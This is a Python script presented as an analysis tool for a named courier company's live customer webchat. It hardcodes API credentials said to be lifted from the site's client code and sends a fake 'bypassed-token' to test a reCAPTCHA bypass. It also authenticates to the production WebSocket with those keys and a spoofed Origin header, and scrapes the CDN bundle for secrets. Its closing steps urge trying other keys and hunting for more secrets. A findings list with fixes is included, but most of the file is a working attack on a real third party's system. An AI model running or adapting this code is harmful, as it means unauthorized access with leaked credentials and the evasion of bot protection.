#!/usr/bin/env python3
"""
Purolator WebChat API Analysis Tool
Analyzes the webchat bot infrastructure and tests API endpoints
"""
import base64
import json
import asyncio
import websockets
import requests
from datetime import datetime
import uuid
class PurolatorWebChatAnalyzer:
"""Analyzer for Purolator's webchat infrastructure"""
# Decoded API credentials from the minified code
API_KEY_1 = {
"application_uuid": "X7EUYljAOq9K8oA0Xz5H3ImOznF4dCx3bUcd",
"access_key": "zrbSN00B5Zk5OTrSrbm2fQ29Keo8Sf1MkWRsSqHUefnwjgGe51QxRW3a0W0cEHwck06iczo1jf1LXirB5ePNfJDWUdtxSyOIA3nw"
}
# Decoded API credentials from WebChatConfigurator class
API_KEY_2 = {
"application_uuid": "pRCzU5eBwev4rozElybd Ndkxp UxahVJL rtqK",
"access_key": "Dkn6d3ZwLxipqfvm5S8cNcnHL5nAFEzbsJ23ryFxaaMds84ASk7Z3ekbBNLlxlSBpQgXgjKcWqnn1GXZ0lSVjwbjX1UiIjL7Ovpy"
}
# Infrastructure endpoints
WEBSOCKET_URL = "wss://us1-m.ocp.ai/chat/ws/session"
CDN_URL = "https://cdn.us1-m.ocp.ai/modules/chatwidget/bundle.js"
RECAPTCHA_SITE_KEY = "6LdDRnIqAAAAADfbHREtkXOOX6QtmC9mLCFnhFHf"
RECAPTCHA_VERIFY_URL = "https://webchat-integration.admin9858.workers.dev/"
def __init__(self, use_key_2=False):
self.api_creds = self.API_KEY_2 if use_key_2 else self.API_KEY_1
self.session_id = str(uuid.uuid4())
def print_banner(self):
"""Print analysis banner"""
print("=" * 80)
print("π PUROLATOR WEBCHAT API ANALYSIS TOOL")
print("=" * 80)
print(f"Timestamp: {datetime.now().isoformat()}")
print(f"Session ID: {self.session_id}")
print(
f"Using API Key: {'#2 (WebChatConfigurator)' if self.api_creds == self.API_KEY_2 else '#1 (Minified)'}")
print("=" * 80)
print()
def analyze_credentials(self):
"""Analyze the exposed API credentials"""
print("[*] EXPOSED API CREDENTIALS")
print("-" * 80)
print(f"Application UUID: {self.api_creds['application_uuid']}")
print(
f"Access Key: {self.api_creds['access_key'][:30]}...{self.api_creds['access_key'][-10:]}")
print(
f"Access Key Length: {len(self.api_creds['access_key'])} characters")
print()
def analyze_infrastructure(self):
"""Analyze the infrastructure endpoints"""
print("[*] INFRASTRUCTURE ENDPOINTS")
print("-" * 80)
print(f"WebSocket Backend: {self.WEBSOCKET_URL}")
print(f"CDN Bundle: {self.CDN_URL}")
print(f"reCAPTCHA Site Key: {self.RECAPTCHA_SITE_KEY}")
print(f"reCAPTCHA Verify: {self.RECAPTCHA_VERIFY_URL}")
print()
def test_recaptcha_bypass(self):
"""Test the reCAPTCHA bypass mechanism"""
print("[*] TESTING RECAPTCHA BYPASS")
print("-" * 80)
# Test with bypassed token
try:
response = requests.post(
self.RECAPTCHA_VERIFY_URL,
json={"token": "bypassed-token"},
headers={"Content-Type": "application/json"},
timeout=10
)
print(f"Status Code: {response.status_code}")
print(f"Response: {json.dumps(response.json(), indent=2)}")
except Exception as e:
print(f"Error: {e}")
print()
def test_cdn_bundle(self):
"""Test access to CDN bundle"""
print("[*] TESTING CDN BUNDLE ACCESS")
print("-" * 80)
try:
response = requests.get(self.CDN_URL, timeout=10)
print(f"Status Code: {response.status_code}")
print(f"Content Length: {len(response.content)} bytes")
print(f"Content Type: {response.headers.get('Content-Type')}")
# Check for interesting strings in the bundle
content = response.text
interesting_keywords = ['apiKey', 'secret',
'password', 'token', 'auth', 'credential']
print("\nSearching for interesting keywords...")
for keyword in interesting_keywords:
count = content.lower().count(keyword.lower())
if count > 0:
print(f" - '{keyword}': {count} occurrences")
except Exception as e:
print(f"Error: {e}")
print()
async def test_websocket_connection(self):
"""Test WebSocket connection to the chat backend"""
print("[*] TESTING WEBSOCKET CONNECTION")
print("-" * 80)
# Build authentication message
auth_payload = {
"type": "auth",
"application_uuid": self.api_creds['application_uuid'],
"access_key": self.api_creds['access_key'],
"session_id": self.session_id,
"locale": "en",
"device": "Desktop",
"browser": "Chrome",
"browserVersion": "120.0"
}
try:
print(f"Connecting to: {self.WEBSOCKET_URL}")
async with websockets.connect(
self.WEBSOCKET_URL,
extra_headers={
"Origin": "https://www.purolator.com",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0"
}
) as websocket:
print("β WebSocket connection established!")
# Send authentication
print("\nSending authentication...")
await websocket.send(json.dumps(auth_payload))
print(f"Sent: {json.dumps(auth_payload, indent=2)}")
# Wait for response
print("\nWaiting for response...")
try:
response = await asyncio.wait_for(websocket.recv(), timeout=5.0)
print(f"Received: {response}")
# Try to parse as JSON
try:
response_json = json.loads(response)
print(
f"\nParsed Response:\n{json.dumps(response_json, indent=2)}")
except:
pass
except asyncio.TimeoutError:
print("Timeout waiting for response")
except Exception as e:
print(f"Error: {type(e).__name__}: {e}")
print()
def analyze_security_issues(self):
"""Summarize security issues found"""
print("[*] SECURITY ANALYSIS SUMMARY")
print("=" * 80)
issues = [
{
"severity": "CRITICAL",
"title": "Hardcoded API Credentials in Client Code",
"description": "Base64-encoded API keys exposed in minified JavaScript",
"impact": "Unauthorized access to chat backend, potential data access",
"recommendation": "Move credentials to backend, use temporary session tokens"
},
{
"severity": "HIGH",
"title": "reCAPTCHA Bypass Flag",
"description": "bypassRecaptcha flag can skip verification",
"impact": "Bot abuse, automated attacks on chat system",
"recommendation": "Remove bypass flag, enforce server-side validation"
},
{
"severity": "HIGH",
"title": "Direct WebSocket Access",
"description": "Client can directly connect to wss://us1-m.ocp.ai",
"impact": "Protocol manipulation, message injection",
"recommendation": "Implement backend proxy, rate limiting"
},
{
"severity": "MEDIUM",
"title": "Exposed reCAPTCHA Site Key",
"description": "Public site key with known verification endpoint",
"impact": "Potential for automated token generation",
"recommendation": "Monitor for abuse patterns"
},
{
"severity": "MEDIUM",
"title": "Query Parameter Injection",
"description": "Intent/case/pin parameters passed without sanitization",
"impact": "Session manipulation, context injection",
"recommendation": "Validate and sanitize all query parameters"
}
]
for issue in issues:
print(f"\n[{issue['severity']}] {issue['title']}")
print(f"Description: {issue['description']}")
print(f"Impact: {issue['impact']}")
print(f"Recommendation: {issue['recommendation']}")
print("\n" + "=" * 80)
def generate_poc_html(self):
"""Generate PoC HTML file to test direct API access"""
html_content = '''
Purolator WebChat PoC
π Purolator WebChat API - Direct Access PoC
Status: Disconnected
'''
with open('purolator_webchat_poc.html', 'w', encoding='utf-8') as f:
f.write(html_content)
print("[+] PoC HTML file generated: purolator_webchat_poc.html")
print(" Open this file in a browser to test direct WebSocket access")
print()
def main():
"""Main execution"""
analyzer = PurolatorWebChatAnalyzer(use_key_2=False)
analyzer.print_banner()
analyzer.analyze_credentials()
analyzer.analyze_infrastructure()
analyzer.test_recaptcha_bypass()
analyzer.test_cdn_bundle()
# Run async WebSocket test
print("[*] Starting WebSocket connection test...")
try:
asyncio.run(analyzer.test_websocket_connection())
except Exception as e:
print(f"WebSocket test failed: {e}")
analyzer.analyze_security_issues()
analyzer.generate_poc_html()
print("\n[β] Analysis complete!")
print("\nNext steps:")
print(" 1. Open purolator_webchat_poc.html in a browser")
print(" 2. Test WebSocket connections with different API keys")
print(" 3. Monitor network traffic for additional endpoints")
print(" 4. Analyze CDN bundle for additional secrets")
if __name__ == "__main__":
main()